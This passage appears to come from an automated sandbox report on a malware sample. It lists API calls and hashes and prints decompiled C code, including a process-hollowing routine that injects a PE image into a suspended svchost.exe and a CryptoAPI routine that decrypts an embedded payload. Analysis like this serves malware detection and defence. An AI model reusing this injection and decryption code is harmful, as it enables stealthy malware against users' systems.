                                                                                                                                                                                                                                                                                          0x040052a8
                                                                                                                                                                                                                                                                                          0x040052b2
                                                                                                                                                                                                                                                                                          0x040052eb
                                                                                                                                                                                                                                                                                          0x040052f3
                                                                                                                                                                                                                                                                                          0x0400530e
                                                                                                                                                                                                                                                                                          0x04005313
                                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                                          0x0400532b
                                                                                                                                                                                                                                                                                          0x0400533f
                                                                                                                                                                                                                                                                                          0x04005344
                                                                                                                                                                                                                                                                                          0x04005347
                                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                                          0x040056b8
                                                                                                                                                                                                                                                                                          0x040056c3
                                                                                                                                                                                                                                                                                          0x040056d4
                                                                                                                                                                                                                                                                                          0x040056e5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                                          0x04005362
                                                                                                                                                                                                                                                                                          0x0400537f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005397
                                                                                                                                                                                                                                                                                          0x0400539d
                                                                                                                                                                                                                                                                                          0x040053a0
                                                                                                                                                                                                                                                                                          0x040053ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040053d0
                                                                                                                                                                                                                                                                                          0x040053da
                                                                                                                                                                                                                                                                                          0x040053fd
                                                                                                                                                                                                                                                                                          0x04005403
                                                                                                                                                                                                                                                                                          0x04005439
                                                                                                                                                                                                                                                                                          0x0400543e
                                                                                                                                                                                                                                                                                          0x04005441
                                                                                                                                                                                                                                                                                          0x0400544e
                                                                                                                                                                                                                                                                                          0x0400569b
                                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                                          0x04005477
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400548b
                                                                                                                                                                                                                                                                                          0x04005491
                                                                                                                                                                                                                                                                                          0x0400549b
                                                                                                                                                                                                                                                                                          0x040054a5
                                                                                                                                                                                                                                                                                          0x040054c0
                                                                                                                                                                                                                                                                                          0x040054f5
                                                                                                                                                                                                                                                                                          0x040054fa
                                                                                                                                                                                                                                                                                          0x040054fd
                                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400551d
                                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                                          0x04005533
                                                                                                                                                                                                                                                                                          0x04005540
                                                                                                                                                                                                                                                                                          0x04005598
                                                                                                                                                                                                                                                                                          0x040055ae
                                                                                                                                                                                                                                                                                          0x040055b4
                                                                                                                                                                                                                                                                                          0x040055c1
                                                                                                                                                                                                                                                                                          0x040055d8
                                                                                                                                                                                                                                                                                          0x04005631
                                                                                                                                                                                                                                                                                          0x04005654
                                                                                                                                                                                                                                                                                          0x04005659
                                                                                                                                                                                                                                                                                          0x040055da
                                                                                                                                                                                                                                                                                          0x040055ef
                                                                                                                                                                                                                                                                                          0x04005612
                                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                                          0x0400566b
                                                                                                                                                                                                                                                                                          0x0400567c
                                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                                          0x04005542
                                                                                                                                                                                                                                                                                          0x04005552
                                                                                                                                                                                                                                                                                          0x0400555b
                                                                                                                                                                                                                                                                                          0x04005573
                                                                                                                                                                                                                                                                                          0x04005578
                                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004bf9

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004BAC
                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004BDB
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 04004C19
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C49
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040056F0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                                          • String ID: $`$pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 1834614700-42206024
                                                                                                                                                                                                                                                                                          • Opcode ID: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                                          • Instruction ID: f4bd0befb8abd7887e3d73177c72bf7f141d25b4899fa760b57ca1a426edb567
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b588b8632747e3a4410319c3fb32f93fea484f2e03b927fbc22a93c38a5764c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39628DB1D00218ABFB14DBA0DC84FEDB7B9AF49309F04C559E6057B281E775AA84CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040020B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1016;
                                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                          				void _v1100;
                                                                                                                                                                                                                                                                                          				signed int _v1104;
                                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				int _t130;
                                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                                          				int _t140;
                                                                                                                                                                                                                                                                                          				int _t143;
                                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                                                                                                                          				void* _t266;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                                          				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                                          				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                                          					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E04007D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                                          				E04007D20( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                                          				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                                          				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                                          				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                          				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                                          				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                          				_v12 = _t128;
                                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                                                                                                          						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                          						_v1100 = _t132;
                                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                                          							E04007B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                                          							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                                          							_v1104 = 0;
                                                                                                                                                                                                                                                                                          							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                          								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E04007B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E040026D0(_v12, _v1100);
                                                                                                                                                                                                                                                                                          							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                                          							if(_t140 != 0) {
                                                                                                                                                                                                                                                                                          								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                                          								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                          								if(_t143 != 0) {
                                                                                                                                                                                                                                                                                          									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                                          									if(_t145 != 0) {
                                                                                                                                                                                                                                                                                          										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                                          										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                          										if(_t148 == 0) {
                                                                                                                                                                                                                                                                                          											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                                          										return _v1012.hProcess;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                          						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                                          						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x040020bd
                                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002502
                                                                                                                                                                                                                                                                                          0x040020d4
                                                                                                                                                                                                                                                                                          0x040020e6
                                                                                                                                                                                                                                                                                          0x040020f0
                                                                                                                                                                                                                                                                                          0x040020fe
                                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                                          0x0400210f
                                                                                                                                                                                                                                                                                          0x04002120
                                                                                                                                                                                                                                                                                          0x04002133
                                                                                                                                                                                                                                                                                          0x04002138
                                                                                                                                                                                                                                                                                          0x0400213b
                                                                                                                                                                                                                                                                                          0x0400214e
                                                                                                                                                                                                                                                                                          0x04002168
                                                                                                                                                                                                                                                                                          0x04002177
                                                                                                                                                                                                                                                                                          0x04002187
                                                                                                                                                                                                                                                                                          0x0400218d
                                                                                                                                                                                                                                                                                          0x04002194
                                                                                                                                                                                                                                                                                          0x040021c0
                                                                                                                                                                                                                                                                                          0x040021c8
                                                                                                                                                                                                                                                                                          0x040021fe
                                                                                                                                                                                                                                                                                          0x04002204
                                                                                                                                                                                                                                                                                          0x04002211
                                                                                                                                                                                                                                                                                          0x0400227d
                                                                                                                                                                                                                                                                                          0x0400228f
                                                                                                                                                                                                                                                                                          0x04002294
                                                                                                                                                                                                                                                                                          0x04002297
                                                                                                                                                                                                                                                                                          0x040022b2
                                                                                                                                                                                                                                                                                          0x040022ce
                                                                                                                                                                                                                                                                                          0x0400235e
                                                                                                                                                                                                                                                                                          0x04002363
                                                                                                                                                                                                                                                                                          0x040022d0
                                                                                                                                                                                                                                                                                          0x04002312
                                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                                          0x04002317
                                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                                          0x040022ac
                                                                                                                                                                                                                                                                                          0x04002376
                                                                                                                                                                                                                                                                                          0x04002396
                                                                                                                                                                                                                                                                                          0x0400239e
                                                                                                                                                                                                                                                                                          0x040023ec
                                                                                                                                                                                                                                                                                          0x040023f2
                                                                                                                                                                                                                                                                                          0x0400240a
                                                                                                                                                                                                                                                                                          0x04002412
                                                                                                                                                                                                                                                                                          0x04002460
                                                                                                                                                                                                                                                                                          0x04002468
                                                                                                                                                                                                                                                                                          0x040024a6
                                                                                                                                                                                                                                                                                          0x040024ba
                                                                                                                                                                                                                                                                                          0x040024c2
                                                                                                                                                                                                                                                                                          0x040024e2
                                                                                                                                                                                                                                                                                          0x040024ef
                                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040024fc
                                                                                                                                                                                                                                                                                          0x040024cb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040024d1
                                                                                                                                                                                                                                                                                          0x04002473
                                                                                                                                                                                                                                                                                          0x04002480
                                                                                                                                                                                                                                                                                          0x0400248d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002493
                                                                                                                                                                                                                                                                                          0x0400241d
                                                                                                                                                                                                                                                                                          0x0400242a
                                                                                                                                                                                                                                                                                          0x04002437
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400243d
                                                                                                                                                                                                                                                                                          0x040023a9
                                                                                                                                                                                                                                                                                          0x040023b6
                                                                                                                                                                                                                                                                                          0x040023c3
                                                                                                                                                                                                                                                                                          0x040023d4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040023da
                                                                                                                                                                                                                                                                                          0x0400222d
                                                                                                                                                                                                                                                                                          0x0400223a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002245
                                                                                                                                                                                                                                                                                          0x04002252
                                                                                                                                                                                                                                                                                          0x0400225f
                                                                                                                                                                                                                                                                                          0x04002270
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002276
                                                                                                                                                                                                                                                                                          0x040021d5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002196
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002196

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 0400210F
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002187
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 04002227
                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002245
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002252
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400225F
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                                          • Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                                          • Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 536 40047f0-4004801 537 4004807-400480e 536->537 538 4004aab-4004ab1 536->538 537->538 539 4004814-4004832 CryptAcquireContextA 537->539 540 4004834-400483f GetLastError 539->540 541 4004856-400485a 539->541 540->541 542 4004841-4004850 CryptAcquireContextA 540->542 541->538 543 4004860-400489d 541->543 542->541 545 40048a3-40048f3 call 4007b70 CryptCreateHash 543->545 546 4004a9f-4004aa5 CryptReleaseContext 543->546 549 4004a90-4004a96 545->549 550 40048f9-4004913 CryptHashData 545->550 546->538 551 4004a98 549->551 552 4004a9a 549->552 553 4004a83-4004a8a CryptDestroyHash 550->553 554 4004919-4004944 CryptDeriveKey 550->554 551->546 552->546 553->549 554->553 555 400494a-400498f CryptDecrypt CryptDestroyKey 554->555 555->553 556 4004995-40049b1 CryptCreateHash 555->556 556->553 557 40049b7-40049d4 CryptHashData 556->557 558 4004a76-4004a7d CryptDestroyHash 557->558 559 40049da-4004a0f CryptGetHashParam 557->559 558->553 559->558 560 4004a11-4004a3c CryptGetHashParam 559->560 560->558 561 4004a3e-4004a58 call 4007c70 560->561 561->558 564 4004a5a-4004a72 call 4007b70 561->564 564->558
                                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                          			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                                          				char _v764;
                                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                                          				intOrPtr _v784;
                                                                                                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                                                                                                          				int _v792;
                                                                                                                                                                                                                                                                                          				int _v796;
                                                                                                                                                                                                                                                                                          				intOrPtr _v800;
                                                                                                                                                                                                                                                                                          				long* _v804;
                                                                                                                                                                                                                                                                                          				int _v808;
                                                                                                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                                                                                                          				char _v816;
                                                                                                                                                                                                                                                                                          				int _v820;
                                                                                                                                                                                                                                                                                          				char _v824;
                                                                                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                                                                                          				char _v844;
                                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                                          				char* _t67;
                                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                                          				char* _t73;
                                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                                          				signed char _t78;
                                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                                          						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v788 = 0x10;
                                                                                                                                                                                                                                                                                          						_v784 = 0x10;
                                                                                                                                                                                                                                                                                          						_v792 = 0;
                                                                                                                                                                                                                                                                                          						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                                          							E04007B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                                          							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                          							_t67 =  &_v780;
                                                                                                                                                                                                                                                                                          							_v800 = _t67;
                                                                                                                                                                                                                                                                                          							_v796 = 0;
                                                                                                                                                                                                                                                                                          							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
                                                                                                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                                          								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t68 = _v800;
                                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          								_v804 = 0;
                                                                                                                                                                                                                                                                                          								_t69 = _v796;
                                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                                          								if(_t69 != 0) {
                                                                                                                                                                                                                                                                                          									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                                          									_t71 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812); // executed
                                                                                                                                                                                                                                                                                          									_v808 = _t71;
                                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                                          									if(_v808 != 0) {
                                                                                                                                                                                                                                                                                          										_t73 =  &_v816;
                                                                                                                                                                                                                                                                                          										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73); // executed
